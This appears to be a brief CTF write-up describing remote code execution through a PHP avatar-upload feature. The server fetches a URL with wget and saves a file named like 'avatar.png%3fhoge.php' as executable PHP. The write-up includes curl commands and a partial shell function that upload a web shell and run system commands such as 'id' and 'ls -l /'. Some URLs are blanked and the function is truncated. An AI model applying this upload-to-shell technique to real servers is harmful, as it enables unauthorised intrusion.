This CTF was diffcult, and it seemed to be not well-prepared. I want to see the graph of the number of problems.

Our team could solve only this. But, considering the solved numbers, we needed to solve also CYKOR_0000*s and noted.


Upload your .php as avatar.png%3fhoge.php into the /data/$sessId/ directory and execute it on the server.

You can upload files via the system('/usr/bin/wget '.escapeshellarg($origUrl));. Make returns something, and call:

$ curl '' -D- -H 'Cookie: PHPSESSID=mde2hg0rm37k28vl8rvatkco31; path=/' -F image=''

This makes the file on So if you use image=', it becomes and this is executed on the server when you request it.

This is enough to see the flag. Define a utility function and explore it, you will found the executable which has the flag.

execute_php() {
    cat > path/to/avatar.png
    curl '' -D- -H 'Cookie: PHPSESSID=mde2hg0rm37k28vl8rvatkco31; path=/' -F image=''$key'.php'
    curl -D- ''$key'.php'
system('id', $retval);
system('pwd', $retval);
system('ls -l /', $retval);
system('stat /flag_is_heeeeeeeereeeeeee', $retval);
system('/flag_is_heeeeeeeereeeeeee', $retval); // => flag